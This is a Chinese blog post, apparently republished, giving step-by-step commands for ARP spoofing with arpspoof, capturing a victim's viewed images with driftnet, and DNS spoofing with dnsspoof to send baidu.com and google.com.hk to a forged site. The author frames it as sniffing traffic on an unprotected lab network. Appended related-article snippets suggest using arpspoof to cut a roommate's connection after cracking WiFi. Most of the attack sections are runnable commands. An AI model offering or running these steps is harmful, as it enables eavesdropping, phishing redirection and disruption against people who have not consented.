arpspoof and dnsspoof

2024-04-01 05:58
文章标签 arpspoof dnsspoof

本文主要是介绍arpspoof and dnsspoof,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

最近搞了一个监听神器,尽管使用了网卡混杂模式,不过监听到的几乎全是本地流量, 为了获取更多有用的数据,搞一下中间人攻击,最基本的就是arpspoof + IP转发,这样就可以获得局域网内任何人的上网流量, 难得的是实验室没有做ARP防护,给arpspoof一个大行其道的机会。

arpspoof

  1. 实战环境
  • 攻击者(kali linux):10.10.10.1
  • 攻击目标:10.10.10.2
  • 默认网关:10.10.10.254
  1. 攻击步骤

首先在本地开启IP转发,否则很容易被发觉。

echo 1 » /proc/sys/net/ipv4/ip_forward

用man arpspoof查看参数详细说明
首先跟10.10.10.2说我是网关10.10.10.254

arpspoof -i eth0 -t 10.10.10.2 10.10.10.254

然后跟网关10.10.10.254说我是10.10.10.2,完成双向欺骗

arpspoof -i eth0 -t 10.10.10.254 10.10.10.2

上面两条arpspoof指令可以用下面一个指令完成

arpspoof -i eth0 -t 10.10.10.2 -r 10.10.10.254

最后利用driftnet工具捕获并友好地显示10.10.10.2在网上浏览的图片

driftnet -i eth0

REF

dnsspoof

1. 攻击环境

  • 攻击者(kali linux):10.10.10.1
  • 攻击目标:10.10.10.2
  • 默认网关:10.10.10.254
  • DNS服务器: 8.8.8.8
  • 伪造网站: 10.10.10.3

2. 攻击步骤

先进行arp欺骗,以中转攻击目标的所有上网流量

echo 1 » /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2

按照hosts文件格式,创建一个dnsspoof.hosts文件, 当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。

cat dnsspoof.hosts
10.10.10.3 *.baidu.com
10.10.10.3 *.google.com.hk

执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则

dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53

这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。

通过抓包分析,dnsspoof的原理如下

由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3。

这篇关于arpspoof and dnsspoof的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/866382

相关文章

arp攻击----arpspoof

装好kali破解了WiFi密码现在就能做些好玩的恶作剧啦。这玩意儿可以让你指定的目标不能再用局域网上网,很适合室友打团时使用 命令 arpspoof -i 你的网卡 -t 目标ip 局域网网关ip 命令很简单,就三个参数,直接上图演示 我用win10做受害机,klai做攻击机演示 看到图中选中的wlan0没?那就是接口,也就是你使用的网卡(一般kali大家都用的无线网卡就是wlan0之类

通过arpspoof,dnsspoof和Apache2进行DNS欺骗进行转发,例:转发到4399

首先先输入su进入root用户然后开启转发 echo 1 >/proc/sys/net/ipv4/ip_forward 看看是否开启成功,返回1为成功 cat /proc/sys/net/ipv4/ip_forward 下载dnsspoof工具 apt-get install dsniff 从查看自己的ip和目标的ip   用kali的网关ip进行攻击 arpspoof